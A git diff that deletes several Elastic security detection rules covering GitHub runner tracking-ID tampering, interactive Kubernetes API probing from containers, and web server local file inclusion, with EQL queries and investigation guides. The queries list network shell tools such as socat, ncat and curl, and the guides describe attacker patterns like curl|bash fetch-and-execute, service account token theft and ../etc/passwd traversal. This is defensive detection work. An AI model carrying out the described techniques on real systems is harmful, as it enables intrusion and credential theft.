Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml deleted file mode 100644 index 65d688cfd2b..00000000000 --- a/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml +++ /dev/null @@ -1,121 +0,0 @@ -[metadata] -creation_date = "2025/11/27" -integration = ["endpoint"] -maturity = "production" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects processes spawned by GitHub Actions runners where "RUNNER_TRACKING_ID" is overridden from its -default "github_*" value. Such tampering has been associated with attempts to evade runner tracking/cleanup on -self-hosted runners, including behavior observed in the Shai-Hulud 2.0 npm worm campaign. -""" -from = "now-9m" -index = ["logs-endpoint.events.process*"] -language = "eql" -license = "Elastic License v2" -name = "Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners" -note = """## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Tampering with RUNNER_TRACKING_ID in GitHub Actions Runners - -This rule surfaces processes launched by GitHub Actions runners where RUNNER_TRACKING_ID is deliberately set to a non-default value. Attackers do this to break runner job tracking and cleanup on self-hosted runners, enabling long‑lived or hidden workloads. A common pattern is a workflow step that exports a custom RUNNER_TRACKING_ID and then spawns bash or node to fetch and execute a script via curl|bash or npm install scripts, keeping the process alive after the job finishes to run mining or exfil tasks. - -### Possible investigation steps - -- Correlate the event to its GitHub Actions run/job and workflow YAML, identify the repository and actor (commit/PR), and verify whether RUNNER_TRACKING_ID was explicitly set in the workflow or injected by a step script. -- On the runner host, determine if the spawned process persisted beyond job completion by checking for orphaning or reparenting to PID 1, sustained CPU/memory usage, and timestamps relative to the runner process exit. -- Review nearby telemetry for fetch-and-execute patterns (curl|bash, wget, node/npm lifecycle scripts), unexpected file writes under /tmp or actions-runner/_work, and outbound connections to non-GitHub endpoints. -- Enumerate persistence artifacts created during the run, including crontab entries, systemd unit files, pm2 or nohup sessions, and changes to authorized_keys or rc.local, and tie them back to the suspicious process. -- Assess blast radius by listing secrets and tokens available to the job, checking audit logs for their subsequent use from the runner IP or unusual repositories, and decide whether to revoke or rotate credentials. - -### False positive analysis - -- A self-hosted runner bootstrap script or base image intentionally sets a fixed RUNNER_TRACKING_ID for internal log correlation or debugging, causing all runner-spawned processes to inherit a non-github_* value. -- A composite action or reusable workflow accidentally overrides RUNNER_TRACKING_ID through env mapping or variable expansion (for example templating it from the run ID), resulting in benign non-default values during standard jobs. - -### Response and remediation - -- Quarantine the self-hosted runner by stopping Runner.Listener, removing the runner from the repository/organization, and terminating any Runner.Worker children or orphaned processes (PID 1) that carry a non-default RUNNER_TRACKING_ID. -- Purge persistence by removing artifacts created during the run, including systemd unit files under /etc/systemd/system, crontab entries in /var/spool/cron, pm2/nohup sessions, edits to ~/.ssh/authorized_keys or /etc/rc.local, and files under /tmp and actions-runner/_work linked to the tampered process. -- Revoke and rotate credentials exposed to the job (GITHUB_TOKEN, personal access tokens, cloud keys), delete leftover containers and caches in actions-runner/_work, invalidate the runner registration, and redeploy the runner from a clean, patched image. -- Escalate to incident response if you observe outbound connections to non-GitHub endpoints, processes persisting after job completion, modifications to ~/.ssh/authorized_keys or /etc/systemd/system, or repeated RUNNER_TRACKING_ID tampering across runners or repositories. -- Harden by restricting self-hosted runners to trusted repositories and actors, enforcing ephemeral per-job runners with egress allowlisting to github.com, setting strict job timeouts, and adding a workflow guard step that exits if RUNNER_TRACKING_ID does not start with github_.""" -references = [ - "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", - "https://socket.dev/blog/shai-hulud-strikes-again-v2", - "https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack", - "https://www.praetorian.com/blog/self-hosted-github-runners-are-backdoors/", -] -risk_score = 47 -rule_id = "df0553c8-2296-45ef-b4dc-3b88c4c130a7" -setup = """## Setup - -This rule requires data coming in from Elastic Defend. - -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html). - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click "Add integrations". -- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. -- Click "Add Elastic Defend". -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html). -- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html). -- Click "Save and Continue". -- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). - -Elastic Defend integration does not collect environment variable logging by default. -In order to capture this behavior, this rule requires a specific configuration option set within the advanced settings of the Elastic Defend integration. - #### To set up environment variable capture for an Elastic Agent policy: -- Go to “Security → Manage → Policies”. -- Select an “Elastic Agent policy”. -- Click “Show advanced settings”. -- Scroll down or search for “linux.advanced.capture_env_vars”. -- Enter the names of environment variables you want to capture, separated by commas. -- For Linux, this rule requires the linux.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID". -- For macOS, this rule requires the macos.advanced.capture_env_vars variable to be set to "RUNNER_TRACKING_ID". -- Click “Save”. -After saving the integration change, the Elastic Agents running this policy will be updated and the rule will function properly. -For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). -""" -severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -process where host.os.type in ("linux", "macos") and event.type == "start" and event.action == "exec" and -process.parent.name in ("Runner.Worker", "Runner.Listener") and process.env_vars like~ "RUNNER_TRACKING_ID*" and -not process.env_vars like~ "RUNNER_TRACKING_ID=github_*" -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml deleted file mode 100644 index 539d57092b7..00000000000 --- a/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml +++ /dev/null @@ -1,112 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend", "kubernetes"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct -interactive Kubernetes API requests. An adversary may need to execute direct interactive Kubernetes API requests to gain -access to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate -the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within -the cluster. Note that this rule may not trigger if the authorization token of the request is expanded within the process -argument list, as the length of the "process.args" field may lead to the field being ignored. -""" -false_positives = [ - """ - There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, - """ - There is a risk of false positives if there are several containers named the same, as the rule may correlate the request - to the wrong container. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Direct Interactive Kubernetes API Request by Common Utilities" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Direct Interactive Kubernetes API Request by Common Utilities - -This detection links an interactive invocation of common networking utilities or kubectl inside a container to a near-simultaneous Kubernetes API response, indicating hands-on-keyboard access to the API server for discovery or lateral movement. A common attacker pattern is compromising a pod, reading its mounted service account token, then running curl or kubectl interactively to query /api or /apis endpoints to list pods and secrets and map cluster scope. - -### Possible investigation steps - -- From Kubernetes audit logs linked to the pod, capture the authenticated principal, namespace, verbs, and request URIs to determine whether the activity focused on discovery or sensitive resources like secrets or RBAC objects. -- Correlate the interactive container activity with kubelet exec/attach or terminal session telemetry to identify who initiated the session and through which source IP or control-plane endpoint. -- Inspect the pod’s service account by validating access to the mounted token path and enumerating its RoleBindings and ClusterRoleBindings to quantify effective privileges and decide on immediate revocation or rotation. -- Review the container image provenance and available shell history or command logs to confirm use of networking utilities or kubectl and identify any reads of secrets, kubeconfig files, or /api and /apis endpoints. -- Expand the time window to find prior or subsequent API calls from the same pod, namespace, or node, and quarantine or cordon the workload if you observe sustained enumeration or cross-namespace access. - -### False positive analysis - -- An operator uses kubectl exec -it to enter a pod and runs kubectl or curl to list resources or verify RBAC, producing interactive process starts and near-simultaneous Kubernetes audit responses that are expected during troubleshooting. -- During routine connectivity or certificate checks, an engineer attaches to a container that includes curl/openssl/socat/ncat and interactively tests the Kubernetes API server endpoint, generating correlated audit events without malicious intent. - -### Response and remediation - -- Immediately isolate the implicated pod by terminating the interactive shell and curl/kubectl processes, applying a deny-all NetworkPolicy in its namespace, and temporarily blocking pod egress to the kube-apiserver address. -- Revoke and rotate the service account credentials used by the pod, invalidate the token at /var/run/secrets/kubernetes.io/serviceaccount/token, and remove excess RoleBindings or ClusterRoleBindings tied to that identity. -- Delete and restore the workload from a trusted image that excludes curl/wget/openssl/socat/ncat, with automountServiceAccountToken disabled and least-privilege RBAC enforced. -- Escalate to incident response if the pod read Secrets or ConfigMaps, modified RBAC objects, attempted create/patch/delete on cluster-scoped resources, or originated from an unapproved operator workstation or bastion. -- Harden by restricting kubectl exec/attach to a small admin group with MFA, enabling admission controls (Pod Security Admission, Gatekeeper, or Kyverno) to block shells or kubectl/netcat in images, and applying egress NetworkPolicies so only approved namespaces can reach https://kubernetes.default.svc. -""" -risk_score = 47 -rule_id = "9d312839-339a-4e10-af2e-a49b15b15d13" -severity = "medium" -tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence with maxspan=1s - [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or - ( - /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", - "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", - "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", - "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", - "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", - "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", - "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) - ) and process.interactive == true and container.id like "*" - ] by orchestrator.resource.name - [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted")] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml deleted file mode 100644 index aed9622e71e..00000000000 --- a/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml +++ /dev/null @@ -1,116 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend", "kubernetes"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of forbidden -interactive Kubernetes API requests. An adversary may need to execute interactive Kubernetes API requests to gain access -to the Kubernetes API server or other resources within the cluster. These requests are often used to enumerate the -Kubernetes API server or other resources within the cluster, and may indicate an attempt to move laterally within the -cluster. Attackers may attempt to access resources that are forbidden by the authorization policy. Note that this rule may -not trigger if the authorization token of the request is expanded within the process argument list, as the length of the -"process.args" field may lead to the field being ignored. -""" -false_positives = [ - """ - There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, - """ - There is a risk of false positives if there are several containers named the same, as the rule may correlate the request - to the wrong container. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Forbidden Direct Interactive Kubernetes API Request" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Forbidden Direct Interactive Kubernetes API Request - -This rule correlates an interactive command execution inside a container with a Kubernetes API request that is explicitly forbidden, signaling hands-on-keyboard probing and unauthorized access attempts. It matters because attackers use live shells to enumerate cluster resources and test privileges for lateral movement or escalation. Example: after compromising a pod, an operator opens a shell and runs kubectl get secrets or curls the API server with the pod’s token, repeatedly receiving 403 Forbidden. - -### Possible investigation steps - -- Correlate the pod, container, namespace, node, and service account from the alert, then quickly pull the matching audit entries to see the verb, resource, requestURI, and userAgent for the forbidden calls. -- Determine whether the container image normally includes utilities like kubectl/curl/openssl or if they were dropped into the pod, and review recent file writes and package installs to differentiate admin debugging from hands-on-keyboard activity. -- Inspect the pod’s service account bindings and effective RBAC in the target namespace to confirm least privilege and understand why the request was denied, then check for other successful API requests from the same identity around the same timeframe. -- Review network connections from the pod to the API server (and any proxies) during the session to validate direct access paths, source IPs, and whether a mounted service account token from /var/run/secrets was used. -- Validate whether this was an authorized SRE/debug session by contacting the workload owner and checking for recent kubectl exec or ephemeral debug activity; if not expected, expand the search for similar forbidden attempts from other pods. - -### False positive analysis - -- An authorized kubectl exec or ephemeral debug session inside a pod where an engineer runs kubectl or curl to probe API resources and, because the pod’s service account is intentionally least‑privileged, the requests are forbidden as expected. -- Benign interactive troubleshooting that mistakenly uses the wrong namespace or queries cluster‑scoped endpoints from within the container (e.g., curl/openssl to the API server), causing the audit logs to show forbid decisions even though no malicious access was attempted. - -### Response and remediation - -- Immediately terminate the interactive shell (e.g., sh/bash) in the offending container and isolate the pod by applying a deny-egress NetworkPolicy in its namespace that blocks outbound connections to https://kubernetes.default.svc and the API server IPs. -- Revoke and rotate credentials by deleting the pod and its ServiceAccount token Secret, temporarily setting automountServiceAccountToken: false on the workload, and redeploying with a new ServiceAccount after validating RBAC least privilege. -- Remove attacker tooling and persistence by rebuilding the container image to exclude kubectl/curl/openssl/socat/ncat, clearing writable volume mounts that contain dropped binaries or scripts, and redeploying from a trusted registry. -- Sweep for spread by identifying pods running the same image or on the same node and terminating any interactive processes issuing Kubernetes API requests from within containers, then restart those workloads cleanly. -- Escalate to incident response if you observe successful API operations (200/201) on secrets, configmaps, or RBAC objects, exec into other pods, or privileged container settings (privileged=true, hostNetwork, or hostPID), indicating lateral movement or credential compromise. -- Harden going forward by tightening RBAC on the new ServiceAccount, enforcing Gatekeeper/OPA policies to deny images that include kubectl/curl and block interactive shells, setting readOnlyRootFilesystem and dropping NET_ADMIN, and restricting API server access via egress controls. -""" -risk_score = 47 -rule_id = "5d1c962d-5d2a-48d4-bdcf-e980e3914947" -severity = "medium" -tags = ["Tactic: Discovery", "Data Source: Elastic Defend for Containers", "Data Source: Kubernetes", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence with maxspan=1s - [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and ( - process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or - ( - /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", - "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", - "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", - "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", - "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", - "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", - "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) - ) and process.interactive == true and container.id like "*" - ] by orchestrator.resource.name - [any where event.dataset == "kubernetes.audit_logs" and kubernetes.audit.stage in ("ResponseComplete", "ResponseStarted") and - `kubernetes.audit.annotations.authorization_k8s_io/decision` == "forbid" - ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml deleted file mode 100644 index 834d2e997a9..00000000000 --- a/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml +++ /dev/null @@ -1,164 +0,0 @@ -[metadata] -creation_date = "2026/01/21" -integration = ["cloud_defend", "kubernetes"] -maturity = "production" -min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" -min_stack_version = "9.3.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule leverages a combination of Defend for Containers and Kubernetes audit logs to detect the execution of direct -interactive Kubernetes API requests via unusual utilities. An adversary may need to execute direct interactive Kubernetes -API requests to gain access to the Kubernetes API server or other resources within the cluster. These requests are often -used to enumerate the Kubernetes API server or other resources within the cluster, and may indicate an attempt to move -laterally within the cluster. -""" -false_positives = [ - """ - There is a potential for false positives if the direct interactive Kubernetes API requests are used for legitimate purposes, - such as debugging or troubleshooting. It is important to investigate any alerts generated by this rule to determine - if they are indicative of malicious activity or part of legitimate container activity. - """, - """ - There is a risk of false positives if there are several containers named the same, as the rule may correlate the request - to the wrong container. - """, -] -from = "now-6m" -index = ["logs-cloud_defend.process*", "logs-kubernetes.audit_logs-*"] -interval = "5m" -language = "eql" -license = "Elastic License v2" -name = "Direct Interactive Kubernetes API Request by Unusual Utilities" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Direct Interactive Kubernetes API Request by Unusual Utilities - -This rule detects interactive commands executed inside containers that use atypical utilities to hit the Kubernetes API, paired with near-simultaneous API activity on pods, secrets, service accounts, roles/bindings, or pod exec/attach/log/portforward. It surfaces hands-on-keyboard discovery and lateral movement using custom scripts that evade common tool allowlists; for example, an intruder opens a shell in a pod, uses Python to query the in-cluster API to list secrets, then triggers pods/exec to pivot into another workload. - -### Possible investigation steps - -- Identify the implicated pod, container image, and executing service account, then quickly review its RBAC bindings and effective permissions to determine blast radius. -- Inspect the container’s interactive session context by pulling recent command lines, shell history, environment variables, and mounted service account tokens, and look for custom scripts or binaries issuing HTTP requests. -- Correlate nearby Kubernetes audit entries tied to the same principal and pod to map accessed resources and verbs, noting any exec/attach/portforward or sensitive object interactions across namespaces. -- Review network activity from the pod to the API server and any in-pod proxies, including DNS lookups and outbound connections, to spot nonstandard clients or tunneling behavior. -- If suspicious, isolate the pod or node, capture runtime artifacts (e.g., process memory or HTTP client traffic), revoke and rotate the service account credentials, and verify image provenance and integrity. - -### False positive analysis - -- An operator interactively attaches to a pod and uses a Python REPL or bash with /dev/tcp to call the in-cluster API for routine troubleshooting (e.g., list pods, read ConfigMaps, or run selfsubjectaccessreviews), producing normal audit entries that match the rule signature. -- A correlation artifact arises when two namespaces have pods with the same name: one pod starts an interactive shell while another independently performs get/list/watch calls, and the 1-second sequence keyed only on pod-name links the unrelated events. - -### Response and remediation - -- Immediately isolate the implicated pod that issued direct API calls using a nonstandard utility by applying a deny-all egress NetworkPolicy in its namespace (including to kubernetes.default.svc:443), terminating the interactive session, and scaling its owning Deployment/Job/StatefulSet to zero replicas. -- Before teardown, capture a runtime snapshot of the container and node including the binary or script used to query the API (e.g., files under /tmp or /dev/tcp usage), shell history, environment, and the mounted service account token and CA bundle at /var/run/secrets/kubernetes.io/serviceaccount/. -- Revoke access by removing the service account’s RoleBindings/ClusterRoleBindings, deleting all pods that mount that service account to force token rotation, rotating any Secrets and ConfigMaps that were read or created during the window, and deleting any unauthorized Jobs, CronJobs, or Deployments created by the same principal. -- Restore workloads from a known-good image digest, re-enable the Deployment only after image scan and integrity checks pass, and monitor subsequent Kubernetes audit logs for pods/exec, portforward, and access to secrets across the affected namespaces. -- Escalate to incident response leadership and consider cluster-wide containment if audit logs show create/patch of ClusterRoleBindings, access to secrets outside the workload’s namespace, or use of pods/exec to pivot into other nodes or system namespaces such as kube-system. -- Harden access by enforcing least-privilege RBAC that denies pods/exec and attach for application service accounts, setting automountServiceAccountToken: false on workloads that do not need it, restricting egress to the API server with NetworkPolicies, and requiring just-in-time break-glass roles for interactive access. -""" -risk_score = 21 -rule_id = "02275e05-57a1-46ab-a443-7fb444da6b28" -severity = "low" -tags = [ - "Data Source: Elastic Defend for Containers", - "Data Source: Kubernetes", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Discovery", - "Resources: Investigation Guide", -] -timestamp_override = "event.ingested" -type = "eql" -query = ''' -sequence with maxspan=1s - [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.interactive == true and - container.id like "*" and - /* Covered by the rule "Direct Interactive Kubernetes API Request by Common Utilities" */ - not ( - process.name in ("wget", "curl", "openssl", "socat", "ncat", "kubectl") or - ( - /* Account for tools that execute utilities as a subprocess, in this case the target utility name will appear as a process arg */ - process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox") and - process.args in ( - "wget", "/bin/wget", "/usr/bin/wget", "/usr/local/bin/wget", - "ssl_client", "/bin/ssl_client", "/usr/bin/ssl_client", "/usr/local/bin/ssl_client", - "curl", "/bin/curl", "/usr/bin/curl", "/usr/local/bin/curl", - "openssl", "/bin/openssl", "/usr/bin/openssl", "/usr/local/bin/openssl", - "socat", "/bin/socat", "/usr/bin/socat", "/usr/local/bin/socat", - "ncat", "/bin/ncat", "/usr/bin/ncat", "/usr/local/bin/ncat", - "kubectl", "/bin/kubectl", "/usr/bin/kubectl", "/usr/local/bin/kubectl" - ) and - /* default exclusion list to not FP on default multi-process commands */ - not process.args in ( - "which", "/bin/which", "/usr/bin/which", "/usr/local/bin/which", - "man", "/bin/man", "/usr/bin/man", "/usr/local/bin/man", - "chmod", "/bin/chmod", "/usr/bin/chmod", "/usr/local/bin/chmod", - "chown", "/bin/chown", "/usr/bin/chown", "/usr/local/bin/chown" - ) - ) or - /* General exclusions for utilities that are not typically used for Kubernetes API requests */ - process.name in ( - "sleep", "head", "tail", "apk", "apt", "apt-get", "dnf", "microdnf", "yum", "zypper", "tdnf", - "pacman", "rpm", "dpkg" - ) - )] by orchestrator.resource.name - [any where - event.dataset == "kubernetes.audit_logs" and - kubernetes.audit.stage in ("ResponseStarted","ResponseComplete") and - kubernetes.audit.verb in ("get", "list", "watch", "create", "patch", "update") and - ( - kubernetes.audit.objectRef.resource in ( - "pods", "secrets", "serviceaccounts", "configmaps", - "roles", "rolebindings", "clusterroles", "clusterrolebindings", - "deployments", "daemonsets", "statefulsets", "jobs", "cronjobs", - "nodes", "namespaces", - "selfsubjectaccessreviews", "selfsubjectrulesreviews", "subjectaccessreviews" - ) - or ( - kubernetes.audit.objectRef.resource == "pods" and - kubernetes.audit.objectRef.subresource in ("exec", "attach", "portforward", "log") - ) - ) - ] by `kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name` -''' - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml deleted file mode 100644 index 2cca4c558fb..00000000000 --- a/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml +++ /dev/null @@ -1,177 +0,0 @@ -[metadata] -creation_date = "2025/12/02" -integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] -maturity = "production" -min_stack_version = "9.2.0" -min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" -updated_date = "2026/03/23" - -[rule] -author = ["Elastic"] -description = """ -This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that -attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may -exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server. -""" -from = "now-11m" -interval = "10m" -language = "esql" -license = "Elastic License v2" -name = "Web Server Local File Inclusion Activity" -note = """ ## Triage and analysis - -> **Disclaimer**: -> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. - -### Investigating Web Server Local File Inclusion Activity - -This rule surfaces successful GET requests containing directory traversal or direct access to sensitive paths, signaling Local File Inclusion exploitation that can expose credentials, configuration, and process context and enable further compromise. A common attacker pattern is abusing a vulnerable parameter to fetch ../../../../etc/passwd, then 